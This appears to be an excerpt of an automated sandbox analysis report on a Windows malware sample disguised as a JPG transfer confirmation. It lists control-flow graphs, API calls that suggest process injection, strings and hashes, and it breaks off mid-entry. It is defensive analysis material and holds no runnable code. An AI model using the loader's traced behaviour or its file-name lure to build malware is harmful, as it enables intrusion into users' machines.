                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                          • String ID: AU3!$EA06
                                                                                                          • API String ID: 1268643489-2658333250
                                                                                                          • Opcode ID: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                                                                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                          • Opcode Fuzzy Hash: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                                                                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2177 401100-401111 2178 401113-401119 2177->2178 2179 401179-401180 2177->2179 2181 401144-40114a 2178->2181 2182 40111b-40111e 2178->2182 2179->2178 2180 401182 2179->2180 2185 40112c-401141 DefWindowProcW 2180->2185 2183 401184-40118e call 401250 2181->2183 2184 40114c-40114f 2181->2184 2182->2181 2186 401120-401126 2182->2186 2194 401193-40119a 2183->2194 2188 401151-401157 2184->2188 2189 40119d 2184->2189 2186->2185 2187 42b038-42b03f 2186->2187 2187->2185 2193 42b045-42b059 call 401000 call 40e0c0 2187->2193 2191 401219-40121f 2188->2191 2192 40115d 2188->2192 2195 4011a3-4011a9 2189->2195 2196 42afb4-42afc5 call 40f190 2189->2196 2191->2186 2199 401225-42b06d call 468b0e 2191->2199 2197 401163-401166 2192->2197 2198 42b01d-42b024 2192->2198 2193->2185 2195->2186 2202 4011af 2195->2202 2196->2194 2206 42afe9-42b018 call 40f190 call 401a50 2197->2206 2207 40116c-401172 2197->2207 2198->2185 2205 42b02a-42b033 call 4370f4 2198->2205 2199->2194 2202->2186 2203 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2202->2203 2204 4011db-401202 SetTimer RegisterWindowMessageW 2202->2204 2204->2194 2212 401204-401216 CreatePopupMenu 2204->2212 2205->2185 2206->2185 2207->2186 2214 401174-42afde call 45fd57 2207->2214 2214->2185 2228 42afe4 2214->2228 2228->2194
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                          • CreatePopupMenu.USER32 ref: 00401204
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                          • String ID: TaskbarCreated
                                                                                                          • API String ID: 129472671-2362178303
                                                                                                          • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                          • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2229 4115d7-4115df 2230 4115ee-4115f9 call 4135bb 2229->2230 2233 4115e1-4115ec call 411988 2230->2233 2234 4115fb-4115fc 2230->2234 2233->2230 2237 4115fd-41160e 2233->2237 2238 411610-41163b call 417fc0 call 41130a 2237->2238 2239 41163c-411656 call 4180af call 418105 2237->2239 2238->2239
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                          • String ID: ,*H$4*H$@fI
                                                                                                          • API String ID: 615853336-1459471987
                                                                                                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2248 3c32658-3c32706 call 3c30048 2251 3c3270d-3c32733 call 3c33568 CreateFileW 2248->2251 2254 3c32735 2251->2254 2255 3c3273a-3c3274a 2251->2255 2256 3c32885-3c32889 2254->2256 2263 3c32751-3c3276b VirtualAlloc 2255->2263 2264 3c3274c 2255->2264 2257 3c328cb-3c328ce 2256->2257 2258 3c3288b-3c3288f 2256->2258 2260 3c328d1-3c328d8 2257->2260 2261 3c32891-3c32894 2258->2261 2262 3c3289b-3c3289f 2258->2262 2265 3c328da-3c328e5 2260->2265 2266 3c3292d-3c32942 2260->2266 2261->2262 2267 3c328a1-3c328ab 2262->2267 2268 3c328af-3c328b3 2262->2268 2269 3c32772-3c32789 ReadFile 2263->2269 2270 3c3276d 2263->2270 2264->2256 2273 3c328e7 2265->2273 2274 3c328e9-3c328f5 2265->2274 2275 3c32952-3c3295a 2266->2275 2276 3c32944-3c3294f VirtualFree 2266->2276 2267->2268 2277 3c328c3 2268->2277 2278 3c328b5-3c328bf 2268->2278 2271 3c32790-3c327d0 VirtualAlloc 2269->2271 2272 3c3278b 2269->2272 2270->2256 2279 3c327d2 2271->2279 2280 3c327d7-3c327f2 call 3c337b8 2271->2280 2272->2256 2273->2266 2281 3c328f7-3c32907 2274->2281 2282 3c32909-3c32915 2274->2282 2276->2275 2277->2257 2278->2277 2279->2256 2288 3c327fd-3c32807 2280->2288 2284 3c3292b 2281->2284 2285 3c32922-3c32928 2282->2285 2286 3c32917-3c32920 2282->2286 2284->2260 2285->2284 2286->2284 2289 3c3283a-3c3284e call 3c335c8 2288->2289 2290 3c32809-3c32838 call 3c337b8 2288->2290 2296 3c32852-3c32856 2289->2296 2297 3c32850 2289->2297 2290->2288 2298 3c32862-3c32866 2296->2298 2299 3c32858-3c3285c CloseHandle 2296->2299 2297->2256 2300 3c32876-3c3287f 2298->2300 2301 3c32868-3c32873 VirtualFree 2298->2301 2299->2298 2300->2251 2300->2256 2301->2300
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03C32729
                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03C3294F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2200355296.0000000003C30000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3c30000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 204039940-0
                                                                                                          • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                          • Instruction ID: e3608c696cc1332473e89b59f6e312e61076a2329255b248013b9553d2147518
                                                                                                          • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                          • Instruction Fuzzy Hash: 47A1F475E00209EBDF14CFA4C894BAEB7B5FF49304F248599E601FB280D7799A81CB51

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2302 4102b0-4102c5 SHGetMalloc 2303 4102cb-4102da SHGetDesktopFolder 2302->2303 2304 425dfd-425e0e call 433244 2302->2304 2305 4102e0-41031a call 412fba 2303->2305 2306 41036b-410379 2303->2306 2314 410360-410368 2305->2314 2315 41031c-410331 SHGetPathFromIDListW 2305->2315 2306->2304 2312 41037f-410384 2306->2312 2314->2306 2316 410351-41035d 2315->2316 2317 410333-41034a call 412fba 2315->2317 2316->2314 2317->2316
                                                                                                          APIs
                                                                                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                          • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                          • _wcsncpy.LIBCMT ref: 00410340
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                          • String ID: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                          • API String ID: 3170942423-1629287200
                                                                                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseOpen
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                          • API String ID: 1586453840-614718249
                                                                                                          • Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                                                                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                          • Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                                                                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateShow
                                                                                                          • String ID: AutoIt v3$edit
                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1612042205-0
                                                                                                          • Opcode ID: 90bc39558da55aafea0c644d420268c7464c042d06742de0e50a33b275c20799
                                                                                                          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                          • Opcode Fuzzy Hash: 90bc39558da55aafea0c644d420268c7464c042d06742de0e50a33b275c20799
                                                                                                          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                          APIs
                                                                                                            • Part of subcall function 03C322E8: Sleep.KERNELBASE(000001F4), ref: 03C322F9
                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03C32549
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2200355296.0000000003C30000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3c30000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileSleep
                                                                                                          • String ID: UAO69A6WZ3WJ37QMTY7
                                                                                                          • API String ID: 2694422964-3161811750
                                                                                                          • Opcode ID: a88ea8032e2aa4222b4b242c7892789deafd479017d9dcc22ce28673977250a3
                                                                                                          • Instruction ID: dfa7f2c25293063b0bbaf4822eaef99dce7b4bdd881c95220fc3b668ca8344a5
                                                                                                          • Opcode Fuzzy Hash: a88ea8032e2aa4222b4b242c7892789deafd479017d9dcc22ce28673977250a3
                                                                                                          • Instruction Fuzzy Hash: E6618270D04248DBEF11DBA4C854BEEBBB9AF19300F044599E609FB2C0D7BA4B45CB65
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$OpenQueryValue
                                                                                                          • String ID: Control Panel\Mouse
                                                                                                          • API String ID: 1607946009-824357125
                                                                                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 0-554117064
                                                                                                          • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                          • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentTerminate
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 2429186680-554117064
                                                                                                          • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                                                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                          • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                                                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03C31AA3
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03C31B39
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03C31B5B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2200355296.0000000003C30000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3c30000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2438371351-0
                                                                                                          • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                                          • Instruction ID: e0453d035b5ed13d5411e6fb7a407cf1419c7a2bea39e25eb387a51ded66c702
                                                                                                          • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                                          • Instruction Fuzzy Hash: DE621A30A14258DBEB24DFA4C844BEEB376EF59300F1491A9D10DEB390E7769E81CB59
                                                                                                          APIs
                                                                                                          Memory Dump Source
